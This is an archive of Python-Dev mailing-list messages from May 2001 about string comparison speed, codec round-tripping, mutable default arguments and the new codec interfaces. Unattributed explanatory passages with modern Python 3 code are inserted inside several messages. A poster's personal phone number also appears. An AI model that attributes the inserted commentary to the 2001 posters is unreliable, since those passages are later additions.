Subject: [Python-Dev] Comparison speed
In-Reply-To:
Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>

Tim Peters :

> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
What Pythonistas wear on their feet?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,          | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand          | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz         +--------------------------------------+

From esr@thyrsus.com Wed May 16 03:27:38 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Tue, 15 May 2001 22:27:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200
References: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>
Message-ID: <20010515222738.A9996@thyrsus.com>

Greg Ewing :
> Tim Peters :
>
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> What Pythonistas wear on their feet?

No, man. It's what sexy lady Pythonistas wear on the beach in Rio.

(Yes, I know some sexy lady Pythonistas. No, you can't have their
phone numbers. Pthfthfthpht...)
--
        Eric S. Raymond

Question with boldness even the existence of a God; because, if there
be one, he must more approve the homage of reason, than that of
blindfolded fear.... Do not be frightened from this inquiry from any
fear of its consequences. If it ends in the belief that there is no
God, you will find incitements to virtue in the comfort and
pleasantness you feel in its exercise...
        -- Thomas Jefferson, in a 1787 letter to his nephew

From tim.one@home.com Wed May 16 08:14:25 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 03:14:25 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3B00E98E.1C44FF5@lemburg.com>
Message-ID:

[MAL]
> Round-tripping is obviously very important if you use Unicode
> as basis for working on text.

Since I use 7-bit ASCII exclusively, I've been using

    encode = decode = lambda x: x

I haven't proved that's round-trippable, but haven't bumped into an
exception yet.

> I don't know about the reasoning behind making cp875 fail the
> round-trip -- Unicode certainly provides means to make mappings
> round-trip safe (e.g. by reverting to the private Unicode
> char. point areas).

Then I ignorantly but confidently (indeed, with the cheery confidence
only the truly ignorant can truly enjoy!) vote for your approach that
maps the non-round-trippable cp875 code points to None.
Better safe than sorry, by default. Else 6 of the 7 ambiguous chars
will be silent surprises by default.

From tim.one@home.com Wed May 16 08:25:28 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 03:25:28 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>
Message-ID:

[Guido]
> PEP 207 is quite explicit that == and != are not to be assumed each
> other's complement. It is silent on the x==x issue but the PEP
> mentions IEEE 754 so I agree that this also shouldn't be cut short.

It's explicit about x==x too:

    (Note: Python currently assumes that x==x is always true and x!=x
    is never true; this should not be assumed.)

That's from the end of point #4, under "Proposed Resolutions". I
agreed then, and still do.

From martin@loewis.home.cs.tu-berlin.de Wed May 16 08:28:45 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:28:45 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from
        Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT))
References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
        <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
        <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>

> Sounds like we ought to do a search-and-destroy on type comparisons,
> replacing with isinstance() where possible.

At least in my applications, this is unfortunately not possible: I
want a test for byte-string-or-unicode-string. This could be done with
two isinstance calls, but that is certainly less efficient.

Marc-Andre once proposed a type representing the immediate supertype
of both byte strings and unicode strings; let's call it abstract
string. Then I could write isinstance(e, types.AbstractString).
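The byte-string-or-unicode-string test can be expressed in two ways without comparing types. This sketch assumes Python 3, where `bytes` and `str` correspond to 2.x's byte and Unicode strings. `isinstance()` accepts a tuple of types; that support arrived in Python 2.2, after this thread. The `abc` module (Python 2.6 and later) lets existing types be registered under a common abstract base. `AbstractString` is a hypothetical class here, not a standard-library type.

```python
import abc

# Option 1: one isinstance() call with a tuple of types.
STRING_TYPES = (str, bytes)

def is_string_tuple(obj):
    return isinstance(obj, STRING_TYPES)

# Option 2: a hypothetical abstract supertype; str and bytes are registered
# as virtual subclasses, so isinstance() answers True for both.
class AbstractString(abc.ABC):
    pass

AbstractString.register(str)
AbstractString.register(bytes)

def is_string_abc(obj):
    return isinstance(obj, AbstractString)

for value in ("text", b"raw", 42):
    print(repr(value), is_string_tuple(value), is_string_abc(value))
# 'text' True True
# b'raw' True True
# 42 False False
```

The tuple form is probably the cheaper check. The ABC route goes through `ABCMeta.__instancecheck__`, so its benefit is not speed but a single named concept that other types can also `register()` with.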
Regards,
Martin

From martin@loewis.home.cs.tu-berlin.de Wed May 16 08:24:56 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:24:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com)
References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
        <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
        <15105.42180.401918.223487@anthem.wooz.org>
Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de>

>     GvR> I'm curious where the frequent comparisons of types come
>     GvR> from.
>
> Not to mention the several hundred comparisons to None.

This is harder to analyse; I set a gdb breakpoint on the place where
RichCompare gets PyType_Type, then tried to see what it does, then
ignored the breakpoint a few times. This is what I've found; I may
have missed important cases.

In PyXML, the expression

    type(e) in [types.StringType, types.UnicodeType]

is frequently computed. This is a sequence_contains, which in turn
does two Py_EQ tests. In addition, compile.c:com_add has

    t = Py_BuildValue("(OO)", v, v->ob_type)
    PyDict_GetItem(dict, t)

Again, the dictionary lookup performs Py_EQ on the tuples, which does
Py_EQ on the elements. This also accounts for the RichCompare calls
which receive None: v may be None, here, so t is (None, type(None)).

In IDLE, the situation is similar. com_add produces many compares with
types. In addition, sre.compile has

    type(s) in sre_compile.STRING_TYPES

which is the same test as the PyXML one. Finally, there is a
type-in-typetuple test inside Tkinter._cnfmerge.

Regards,
Martin

From i_sofer@yahoo.com Wed May 16 08:53:25 2001
From: i_sofer@yahoo.com (Idan Sofer)
Date: 16 May 2001 10:53:25 +0300
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
Message-ID: <200105160756.KAA29616@alpha.netvision.net.il>

Hello.

I have found a rather annoying bug in Python, present in both Python
1.5 and Python 2.0.

If a class has an argument with a default of an empty dictionary, then
all instances of the same class will point to the same dictionary,
unless the dictionary is explicitly defined by the constructor.

I attach a piece of code that demonstrates the problem:

"""
Bug description:

A class is defined. In the __init__ method, we define an optional
"attribs" argument, which defaults to {}.

We create two instances of class foo, each of them without argument.

We then modify the attribs attribute in one of them.

In a surprising manner, the change is reflected in BOTH instances,
where it should only appear in the first one.

Workaround: explicitly define an empty dictionary as the argument, or
define the empty dictionary inside the method body.
"""

class foo:

    def __init__(self,attribs={}):
        self.attribs=attribs;
        return None;

print "";
print "Defining Two instances of class foo:";
print "a=foo()"
print "b=foo()"
a=foo();
b=foo();
print "";
print "The 'attribs' attribute of both looks like this:";
print "a.attribs = %s" % a.attribs
print "b.attribs = %s" % b.attribs
print ""
print "Now we modify 'attribs' in a:"
print 'a.attribs["bug"]= "exists"';
a.attribs["bug"]= "exists";
print ""
print "Now, things should now look like this:"
print "a.attribs = %s" % a.attribs
print "b.attribs = %s" % "{}";
print ""
print "However, things look like this:"
print "a.attribs = %s" % a.attribs
print "b.attribs = %s" % b.attribs

From martin@loewis.home.cs.tu-berlin.de Wed May 16 09:02:01 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 10:02:01 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To:
References:
Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>

> Since that's the exact opposite of what I want to do, it's at least
> interesting.

I'll put a patch on SF soon which does what you want to do, i.e. tries
tp_compare as the first thing if tp_richcompare is not there.

Even with this patch, your code is faster if strings have a
richcompare. Without richcompare, I get

0.720 0.720 0.720 0.730 0.720 0.720 0.730 0.720 0.720 0.730

With it, I get

0.710 0.720 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720

Given that stock CVS python is in the 0.78 range, the difference is
negligible, though.

Regards,
Martin

From larsga@garshol.priv.no Wed May 16 09:19:10 2001
From: larsga@garshol.priv.no (Lars Marius Garshol)
Date: 16 May 2001 10:19:10 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il>
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID:

* Idan Sofer
|
| If a class has an argument with a default of an empty dictionary,
| then all instances of the same class will point to the same
| dictionary, unless the dictionary is explicitly defined by the
| constructor.

This is part of the language semantics, and so not a bug. The default
values of optional arguments are evaluated when the function/method is
compiled.

You may consider the semantics ill-advised, but it is intentional.

| class foo:
|
|     def __init__(self,attribs={}):
|         self.attribs=attribs;
|         return None;

I usually write this as:

class Foo:

    def __init__(self, attribs = None):
        self.attribs = attribs or {}

--Lars M.
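The behaviour Idan reported, and the workaround Lars describes, can be reproduced in a few lines. This sketch assumes Python 3; `Shared` and `Fresh` are illustrative class names. It uses an explicit `is None` test rather than Lars's `attribs or {}`. The reason is that `or` also replaces a caller-supplied empty dict with a new one, so the caller's dict would silently stop being shared with the instance.

```python
class Shared:
    def __init__(self, attribs={}):     # the {} is evaluated once, when def runs
        self.attribs = attribs

class Fresh:
    def __init__(self, attribs=None):
        # A new dict per instance unless the caller passes one in.
        self.attribs = {} if attribs is None else attribs

a, b = Shared(), Shared()
a.attribs["bug"] = "exists"
print(b.attribs)           # {'bug': 'exists'}  (same dict as a.attribs)

c, d = Fresh(), Fresh()
c.attribs["bug"] = "exists"
print(d.attribs)           # {}
```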
From fredrik@pythonware.com Wed May 16 09:18:44 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Wed, 16 May 2001 10:18:44 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff>

Idan Sofer wrote:
>
> I have found a rather annoying bug in Python, present in both Python 1.5
> and Python 2.0.
>
> If a class has an argument with a default of an empty dictionary, then
> all instances of the same class will point to the same dictionary,
> unless the dictionary is explicitly defined by the constructor.

maybe you should check the documentation (or the FAQ) before
submitting bugs?

http://www.python.org/doc/current/ref/function.html

    Default parameter values are evaluated when the function
    definition is executed. This means that the expression is
    evaluated once, when the function is defined, and that that
    same ``pre-computed'' value is used for each call. This is
    especially important to understand when a default parameter
    is a mutable object, such as a list or a dictionary: if the
    function modifies the object (e.g. by appending an item to a
    list), the default value is in effect modified.

Cheers /F

PS. when you do report real bugs, please use the bug tracker:

http://sourceforge.net/tracker/?group_id=5470&atid=105470

"is this a bug" questions should be sent to comp.lang.python

From tim.one@home.com Wed May 16 09:41:47 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 04:41:47 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID:

[Martin]
> Producing numbers is easy :-)

If only making sense of them were too <0.6 wink>.

> I've instrumented my version where string implements richcmp, and
> special-cases everything I can think of.

1. String objects are also equal despite being different objects, if
their ob_sinterned pointers are equal and non-NULL.
So if you're looking for every trick in & out of the book, that's
another one.

2. But the real goal is to add only those special cases that in
combination yield the largest net win, and that's much harder to
determine (since there are no typical apps, and it's very hard to
quantify the tradeoffs here in a credible x-platform x-app way).

> Counting is done for running the test suite. With this, I get
>
> Calls to string_richcompare:  2378660
> Calls with different types:   33992 (ie. one is not a string)
> Calls with identical strings: 120517
> Calls where lens decide !EQ:  1775716
> ----------------------------
> Calls richcmp -> oldcomp:     448435
> Total calls to oldcomp:       1225643
> Calls oldcomp -> memcmp:      860174
>
> So 5% of the calls are with identical strings, for which I can
> immediately decide the outcome.

But also at the cost of doing a fruitless compare and branch in 95% of
calls. There isn't enough data to guess whether this is a net win or a
net loss (compared to leaving this special case out). Note that if the
"identical string pointers" special case is a net win, it would be
effective inside oldcomp instead (i.e., you don't need a richcompare
slot to exploit it); indeed, it may be more effective there, since
there are some 800,000 calls to oldcmp that *didn't* come from
richcmp, and oldcmp doesn't check for pointer equality now (but
PyObject_Compare does, so there didn't *used* to be any point to it in
oldcmp). Any idea where those 800,000 virgin calls to oldcomp are
coming from? That's a lot.

> 75% can be decided in terms of the string lengths, which leaves ca. 19%
> for cases where lexicographical comparison is needed.

So about 1 in 5 times there's also the additional (wrt just calling
oldcmp all the time) overhead of a second function call (i.e., the
call to oldcmp made by richcmp).

> In those cases, the first byte decides in 30%.
> If I remove the test
> for "len decides !EQ", I get
>
> #riches:        2358322
> #riches_ni:     34108
> #idents_decide: 102050
> #lens_decide:   0
> --------------------------------------
> rest(computed): 2222164
> #comps:         2949421
> #memcmps:       917776
>
> So still, ca. 30% can be decided by first byte.

Sorry, I couldn't follow this part, except noting that 917776 is about
30% of 2949421, in which case I would have expected you to say that
70% can be decided by first byte.

> It still appears that the total number of calls to memcmp is higher
> when the length is not taken into consideration.

Since 917776 is larger than the earlier 860174, isn't that plain? BTW,
some compilers inline memcmp, so assuming it's "a call" is an
x-platform trap; of course assuming it *isn't* is also an x-platform
trap.

> To verify this claim, I've counted the cases where the length
> decides the outcome, but looking at the first byte also had:
>
> lens_decide:                     1784897
> lens_decide_firstbyte_wouldhave: 1671148
>
> So in 6% of the cases, checking the length alone gives a decision
> which looking at the first byte doesn't; plus it saves a function
> call.

OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the
*net* effect is muddy at best.

> To support the thesis that Py_EQ is the common case for strings, I
> counted the various operations:
>
> pyEQ:2271593
> pyLE:9234
> pyGE:0
> pyNE:20470
> pyLT:22765
> pyGT:578

This clearly wasn't doing much sorting of strings (or of tuples
containing strings, etc) -- .sort() never uses pyEQ (it only uses
pyLT).

> Now, that might be flawed since comparing strings for equal is
> extremely frequent in the testsuite. To give more credibility to the
> data, I also ran setup.py with my instrumented ./python:

In the absence of non-trivial use of sorting or the bisect module or
one of the search tree modules out there, it's easy to buy that PyEQ
is most common for strings.
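The equality shortcuts Martin counted can be modelled in a few lines. They are: identical objects, differing lengths, the first byte, then a full compare. This sketch assumes Python 3 `bytes`. `strings_equal` is a hypothetical helper that mirrors only the order of the checks, not the C code or its costs. As Tim notes, the length test cannot settle an ordering such as `<`. The identity shortcut is also specific to strings: under IEEE 754 a NaN compares unequal to itself, which is why PEP 207 says x==x should not be assumed.

```python
def strings_equal(a: bytes, b: bytes) -> bool:
    """Equality test applying the cheap checks first."""
    if a is b:               # same object: equal without reading the data
        return True
    if len(a) != len(b):     # different lengths can never be equal
        return False
    if not a:                # both empty
        return True
    if a[0] != b[0]:         # first byte differs: no full compare needed
        return False
    return a == b            # full, memcmp-style comparison

s = b"spam"
print(strings_equal(s, s), strings_equal(b"spam", b"spa"), strings_equal(b"spam", b"spot"))
# True False False

# The identity shortcut is not valid for every type:
nan = float("nan")
print(nan is nan, nan == nan)   # True False
```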
What's not clear is that adding a rich comparison slot actually helps
overall (as compared to continuing to let string_compare() handle it,
and if the pointer equality test actually saves more than it costs,
adding it there instead). It's clearer that this is going to hurt
sorting (& bisect etc), by adding yet another layer of function call
to get Py_LT resolved (as for dict compares too, the string richcmp
can't do anything to speed up Py_LT that string oldcmp can't do just
as efficiently -- indeed, that's the great advantage oldcmp's "compare
first character" test had: that *can* decide Py_LT in one byte much
of the time (but length comparison cannot)).

Note too earlier mail about how adding a richcmp slot to strings will
suddenly slow cmp(string1, string2) (which is the usual way to program
a search tree, because cmp() *used* to call a string comparison
routine only once; but after adding a richcmp slot, each cmp(string1,
string2) will call the richcmp slot from 1 thru 3 times
(data-dependent)).

> ...
> That shows that optimizing for Py_NE is not worth it. With these data,
> I'll upload a patch to SF.

Which is here:

http://sourceforge.net/tracker/index.php?func=detail&aid=424335&group_id=5470&atid=305470

Heh: let's grab all the ugly URLs off of SourceForge, stick them in a
giant list, and sort them. Can't think of a more typical app than
that.

Thanks for the work, Martin!

From tim.one@home.com Wed May 16 09:51:17 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 04:51:17 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org>
Message-ID:

[Barry A. Warsaw]
> ...
> from types import StringType
> import time
>
> r = range(1000000)
>
> def one(r=r):
>     x = 'hello'
>     t0 = time.time()
>     for i in r:

Random clue: when you're too lazy to try to subtract out loop overhead
(not a knock, I am too), you may have better luck with

    r = [1] * 1000000

than

    r = range(1000000)

The reason is that the former way gets to keep incref'ing and
decref'ing a single object (as it's repeatedly bound to "i" across
iterations), instead of slobbering all over memory inc'ing and dec'ing
a million distinct objects.

there's-as-an-art-to-doing-nothing-quickly-ly y'rs  - tim

From tim.one@home.com Wed May 16 09:56:56 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 16 May 2001 04:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com>
Message-ID:

[poor Tim]
> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
[Greg Ewing]
> What Pythonistas wear on their feet?

[Eric S. Raymond]
> No, man. It's what sexy lady Pythonistas wear on the beach in Rio.

Eric wins! That's indeed what I was thinking of. I'm surprised nobody
asked what a lon was. But not as surprised that I didn't try to blame
this on an Outlook 2000 bug.

> (Yes, I know some sexy lady Pythonistas. No, you can't have their
> phone numbers. Pthfthfthpht...)

Too much work anyway. They can have mine: 703 758 8258.

but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs  - tim

From esr@thyrsus.com Wed May 16 10:17:09 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 16 May 2001 05:17:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: ; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400
References: <20010515222738.A9996@thyrsus.com>
Message-ID: <20010516051709.C11602@thyrsus.com>

Tim Peters :
> [poor Tim]
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> [Greg Ewing]
> > What Pythonistas wear on their feet?
>
> [Eric S. Raymond]
> > No, man.
> > It's what sexy lady Pythonistas wear on the beach in Rio.
>
> Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked
> what a lon was. But not as surprised that I didn't try to blame this on an
> Outlook 2000 bug.
>
> > (Yes, I know some sexy lady Pythonistas. No, you can't have their
> > phone numbers. Pthfthfthpht...)
>
> Too much work anyway. They can have mine: 703 758 8258.

Hmmm...now, which one of them should I try to talk into a snakeskin
bikini? Duh. Answer obvious: the one I can talk *out* of a snakeskin
bikini most rapidly afterwards. Then I'll give her your number -- that
is, if I don't get too, er, distracted.

seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours,
--
        Eric S. Raymond

Every Communist must grasp the truth, 'Political power grows out of
the barrel of a gun.'
        -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment.

From mal@lemburg.com Wed May 16 10:29:49 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:29:49 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References:
Message-ID: <3B02488D.415BA95F@lemburg.com>

Tim Peters wrote:
>
> [MAL]
> > Round-tripping is obviously very important if you use Unicode
> > as basis for working on text.
>
> Since I use 7-bit ASCII exclusively, I've been using
>
>     encode = decode = lambda x: x
>
> I haven't proved that's round-trippable, but haven't bumped into an exception
> yet.

For character map codecs the complete range(256) of possible input
characters should pass the round-trip test, that is

    encoded text -> Unicode -> encoded text

should result in the identity mapping for all c in map(chr,range(256)).

> > I don't know about the reasoning behind making cp875 fail the
> > round-trip -- Unicode certainly provides means to make mappings
> > round-trip safe (e.g. by reverting to the private Unicode
> > char. point areas).
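MAL's round-trip criterion (encoded text -> Unicode -> encoded text for every byte 0..255) can be checked mechanically. This sketch assumes Python 3's codec machinery. `is_round_trip_safe` is a hypothetical helper, not a function in `codecs`. It decodes each single byte and re-encodes it, treating any `UnicodeError` as a failure.

```python
def is_round_trip_safe(encoding: str) -> bool:
    """True if every byte 0..255 survives bytes -> str -> bytes unchanged."""
    for i in range(256):
        original = bytes([i])
        try:
            again = original.decode(encoding).encode(encoding)
        except UnicodeError:          # undecodable or unencodable byte
            return False
        if again != original:
            return False
    return True

for name in ("latin-1", "ascii"):
    print(name, is_round_trip_safe(name))
# latin-1 True
# ascii False
```

Applying it to a charmap codec such as `cp875` reports whether that Python version's table round-trips. The answer depends on the mapping tables shipped with the interpreter, so it is not asserted here.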
> > Then I ignorantly but confidently (indeed, with the cheery confidence only > the truly ignorant can truly enjoy!) vote for your approach that maps the > non-round-trippable cp875 code points to None. Better safe than sorry, by > default. Else 6 of the 7 ambiguous chars will be silent surprises by > default. I will check in a patch which moves the building logic for encoding maps to codecs.py. This will simplify the task of choosing the "right" solution. Currently I'm in favour of:

def make_encoding_map(decoding_map):

    """ Creates an encoding map from a decoding map.

        If a target mapping in the decoding map occurs multiple
        times, then that target is mapped to None (undefined mapping),
        causing an exception when encountered by the charmap codec
        during translation.

        One example where this happens is cp875.py which decodes
        multiple characters to \u001a.

    """
    m = {}
    for k,v in decoding_map.items():
        if not m.has_key(v):
            m[v] = k
        else:
            m[v] = None
    return m

Perhaps we should also have a codecs.finalize_decoding_map() API in codecs.py which checks the decoding map and postprocesses it in case it finds a problem ?! -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Wed May 16 10:32:36 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:32:36 +0200 Subject: [Python-Dev] Comparison speed References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> Message-ID: <3B024934.58232325@lemburg.com> "Martin v. Loewis" wrote: > > > Sounds like we ought to do a search-and-destroy on type comparisons, > > replacing with isinstance() where possible.
> > At least in my applications, this is unfortunately not possible: I > want a test for byte-string-or-unicode-string. This could be done with > two isinstance calls, but that is certainly less efficient. > > Marc-Andre once proposed a type representing the immediate supertype > of both byte strings and unicode strings; let's call it abstract string. > Then I could write isinstance(e, types.AbstractString). I'm still holding on to that idea... hopefully, Guido's type checkins will make this possible in 2.2 or 2.3. The same should then be done for numbers, sequences and mappings (all abstract "types" defined in abstract.c). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Wed May 16 10:34:40 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 11:34:40 +0200 Subject: [Python-Dev] Comparison speed References: Message-ID: <3B0249B0.5DD10A4C@lemburg.com> Tim Peters wrote: > > [Martin] > > Producing numbers is easy :-) > > If only making sense of them were too <0.6 wink>. FYI, I've added a few compare tests to pybench which now is available as version 0.9. You can download it from my Python page. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh@python.net Wed May 16 11:53:16 2001 From: mwh@python.net (Michael Hudson) Date: 16 May 2001 11:53:16 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: Guido van Rossum writes: > > I've just checked in a set of patches which implement the new > > .decode() method along with a couple of useful codecs. > > Cool! Indeed. Good idea, Marc! 
This is a bit unfriendly though: >>> "bobbins".encode("gzip") Traceback (most recent call last): File "", line 1, in ? File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.gzip" failed to register I thought SystemErrors shouldn't ever happen (isn't it what gets raised for an illegal opcode, for example?). > > To see just how easy it is to write codecs, please have > > a look at the string codecs I added in this patch (e.g. > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > are a lot more useful things in the standard lib which could > > benefit from these easy-to-use interfaces. > > As an excercise, I added a quoted-printable codec. It was easy > indeed! urlencode would be nice. Maybe re.escape, too. html entities? That's probably a bigger can of worms, but print "

%s

"%text.encode("html") seems delightfully simpleminded. Cheers, M. -- GAG: I think this is perfectly normal behaviour for a Vogon. ... VOGON: That is exactly what you always say. GAG: Well, I think that is probably perfectly normal behaviour for a psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9 From mal@lemburg.com Wed May 16 12:06:14 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 13:06:14 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: <3B025F26.A625DE02@lemburg.com> Michael Hudson wrote: > > Guido van Rossum writes: > > > > I've just checked in a set of patches which implement the new > > > .decode() method along with a couple of useful codecs. > > > > Cool! > > Indeed. Good idea, Marc! Thanks :-) > This is a bit unfriendly though: > > >>> "bobbins".encode("gzip") > Traceback (most recent call last): > File "", line 1, in ? > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > raise SystemError,\ > SystemError: module "encodings.gzip" failed to register > > I thought SystemErrors shouldn't ever happen (isn't it what gets > raised for an illegal opcode, for example?). This is due to the zlib module not being installed. The reason for the search function in encodings/__init__.py raising a SystemError is that it did find a module named gzip, but this module does not export the needed registration API getregentry(). Perhaps it should just raise a LookupError instead, though... > > > To see just how easy it is to write codecs, please have > > > a look at the string codecs I added in this patch (e.g. > > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > > are a lot more useful things in the standard lib which could > > > benefit from these easy-to-use interfaces. > > > > As an excercise, I added a quoted-printable codec. It was easy > > indeed! 
> > urlencode would be nice. Maybe re.escape, too. html entities? > That's probably a bigger can of worms, but > > print "

%s

"%text.encode("html") > > seems delightfully simpleminded. Right. That's the idea... volunteers are welcome :-) There are lots of those little "escape this, encode that" tasks which could benefit from the codec machinery. The ones you mention would certainly be good candidates. pickle and marshal would also be a good to have wrapped as codecs. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh@python.net Wed May 16 12:19:15 2001 From: mwh@python.net (Michael Hudson) Date: 16 May 2001 12:19:15 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > > This is a bit unfriendly though: > > > > >>> "bobbins".encode("gzip") > > Traceback (most recent call last): > > File "", line 1, in ? > > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > > raise SystemError,\ > > SystemError: module "encodings.gzip" failed to register > > > > I thought SystemErrors shouldn't ever happen (isn't it what gets > > raised for an illegal opcode, for example?). > > This is due to the zlib module not being installed. No it's not, actually. I *thought* I was getting the error message because the zlib encoding doesn't alias itself to gzip (whether it should or not is another question). But in fact if you specify a bogus encoding you get a nice error message: >>> "bobbins".encode("nonesuch") Traceback (most recent call last): File "", line 1, in ? LookupError: unknown encoding but: >>> "bobbins".encode("sys") Traceback (most recent call last): File "", line 1, in ? 
File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.sys" failed to register I have to admit I don't really know what's going on here, but the error is just confusing. > The reason for the search function in encodings/__init__.py raising > a SystemError is that it did find a module named gzip, but this > module does not export the needed registration API getregentry(). Yep. > Perhaps it should just raise a LookupError instead, though... Might be easiest. > > urlencode would be nice. Maybe re.escape, too. html entities? > > That's probably a bigger can of worms, but > > > > print "

%s

"%text.encode("html") > > > > seems delightfully simpleminded. > > Right. That's the idea... volunteers are welcome :-) Maybe this evening. > There are lots of those little "escape this, encode that" tasks > which could benefit from the codec machinery. The ones you > mention would certainly be good candidates. pickle and marshal > would also be a good to have wrapped as codecs. Ooh yes, hadn't thought of them. 'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs M. -- There's an aura of unholy black magic about CLISP. It works, but I have no idea how it does it. I suspect there's a goat involved somewhere. -- Johann Hibschman, comp.lang.scheme From aahz@rahul.net Wed May 16 14:16:18 2001 From: aahz@rahul.net (Aahz Maruch) Date: Wed, 16 May 2001 06:16:18 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net> Eric S. Raymond wrote: > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) That's okay, I have their e-mail addresses. Wanna bet on which of us gets a response first? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky 